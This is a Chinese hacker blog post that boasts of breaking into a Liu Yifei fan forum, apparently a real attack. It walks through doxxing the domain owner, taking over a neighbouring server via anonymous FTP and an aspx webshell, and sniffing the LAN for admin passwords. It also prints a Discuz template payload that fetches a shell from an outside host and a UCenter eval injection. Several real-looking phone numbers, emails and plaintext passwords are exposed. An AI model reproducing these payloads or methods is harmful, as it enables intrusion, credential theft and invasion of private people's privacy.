通过社会工程学成功进入刘亦菲官网

网站建设评论58

其实社工成功已经很久了,入侵刘亦菲官方论坛也已经发现并修改

了一切密码。。如果再次发生同样的事,和我无关了。。。我只是把我当时的过程写一下,也给有兴趣的朋友借鉴一下吧,本人也是菜鸟哈·

通过社会工程学成功进入刘亦菲官网-开水网络
入侵

想到社工入侵刘亦菲,其实是看了3EST战队的管理员MARS的一篇:社工王心凌   而一时性起的,嘿嘿。。。所以社工的过程和MARS的文章,差不多,都是那个思路。。我偶像就是刘亦菲啊,也很想知道他的一些小秘密的,搞到邮箱,手机号,那多爽,说干就干就有了这篇文章了(冲动是魔鬼啊。。。)
1.前期的准备。这个不用说,前期准备很重要,关系到成败啊!!查看下刘亦菲官方FAMS论坛:www.52yifei.com.是Discuz! 7.2论坛,哎,手头没ODAY,怎么搞?汗。。开始心就凉了一半了,硬着头皮干下去吧!登录http://www.myip.cn大概查了一下网站所在的IP:222.73.44.45是上海一个IDC机房的,同网站只有几个站都是这个论坛的架构,扫描一下端口,也没什么好入手的地方,悲剧!!再查下这个域名所有者的情况吧!找到注册这个域名所有者姓名是:赵宾 邮箱:mango117@126.com   手机:13864221517   然后进一步百度到他QQ:76007256,网名是:芒果。。。基本上就这些了,登录论坛看了下管理员用户名是什么先,或许可以用上面的一些内容社工出密码都说不定(祈祷中!),果然,看到一个用户:芒果,嘿嘿,有戏,试了一下上面搜索到的东西去试了一下用户为芒果的密码,最后得到密码:zhaobin 就是他的姓名,开始开心了一下,但是最后发现这个用户权限很低,只是一个技术部的头衔,汗,还不是管理员权限,奇怪了,怎么不给自己搞个管理员,这个纳闷了很久,最后才发现他还有其他的用户,不过这个是后话,先看下去怎么社工成功吧!!

2.柳暗花明。刚开始就想着这个网站社工不出来,就搞同服务器的,但是最近在3EST里学了很多,看了MARS的社工王心凌的 学了很多。。其中他搞了一个很关键的一步就是搞C段,这个以前我没有搞过,也挺新鲜的,我就想想,反正没事,就当实践,我也来搞搞C段吧!!!而且IDC机房的服务器很是很脆弱的。。。。然后拿出扫描器,狂扫相连的IP段。。漫长等待之后,不负有心人啊,我惊喜地发现其中一个服务器出现大大的致命漏洞。。他开着FTP,但是FTP可以匿名访问,登录访问一看,竟然电脑所有盘都共享。咳咳,这是等着人家来日?呵呵,马上查了一下,这个服务器绑定的网站是:www.fortuneod.com 然后在E盘看到了他的网站目录,上传一个aspx马上去,这个权限很大,几分钟,这个服务器就沦陷了。。。

3.扩大成果。因为这个是IDC机房,同是局域网的服务器,你想到了什么? 对,就是嗅探了。。。上传强大好用的CAIN嗅探器到服务器里,然后开着嗅探目标站:www.52yifei.com。。。经过几天的嗅探,嗅探出了很多,因为这个论坛会员就差不多有10万,所以查找管理员用户名就难了,不过还是找出来了,茜影菲香:sh911251806   这个就是域名注册者的用户密码,还有其他的管理员就不管了,有一个就可以了。。其他管理是:轩辕侠:000520 BOSShenry:henry363468 启盛:8785561560,后面是密码,不过现在都给改了。。。

4.论坛沦陷。拿到了管理员,但是Discuz! 7.2怎么拿SHELL不懂,看mars的拿shell是:在模板任意位置插入{eval copy(\'http://www.3est.com/mars.txt\', DISCUZ_ROOT.\'./forumdata/shell.php\');然后更新缓存。。。但是我试了一下,竟然没有成功,汗!!百度看下吧。。最好才找到解决方法

1.Ucenter IP插入一句话:hack6\\\\\');eval($_POST[a])?>;//

2. 然后返回刚才插入地方,随便替换几个字母

3.连接文件是根目录下的 config.inc.php

http://localhost/dz/config.inc.php成功插入,我社工了一下,Ucenter管理就是管理员的论坛密码,所以一切在掌握中,拿到了SHELL,论坛沦陷。

5.悲剧收场。我的目的不是服务器,而是刘亦菲密码,因为刘亦菲在论坛有一段时间会来到论坛发帖什么的,他的密码或许就是他邮箱密码?但是一切都是我的一厢情愿,因为就在我苦苦搜索时候,一个事实打击了我,因为开始我有加管理员QQ,并聊了一下,因为在我拿SHELL时候,忘记Ucenter IP修改,然后论坛无法访问了,这样管理员查看到我的IP   并知道是我所为,不过他人很好,和我聊了一些有的没的,并告诉我论坛上的那个刘亦菲,其实是他的经纪人帮发的,叫我不要搞了。。哎,一切都明白了,还是知趣闪了。。。。

 
网站建设

三星手机远程代码执行漏洞分析

摘要远程攻击者完全有能力控制用户网络流量,操纵三星手机的键盘更新机制,并且在目标手机上使用系统用户权限执行代码。在三星设备中预装的快速键盘,无法禁用也无法卸载。即使这个快速键盘并非用户默认使用,攻击者...
如何建设一个个人网站 网站建设

如何建设一个个人网站

个人网站建设方案如何搭建呢?网站的结构一般由以下三部分组成:域名、虚拟主机、网站程序。   个人网站建设方案第一步就是要先注册域名,当我们想要建网站前,想必你已经想好这个网站是用来干嘛的,也就是建站目...
网站建设

挂马另类技巧-分享htc、swf加载网马

这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新...
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: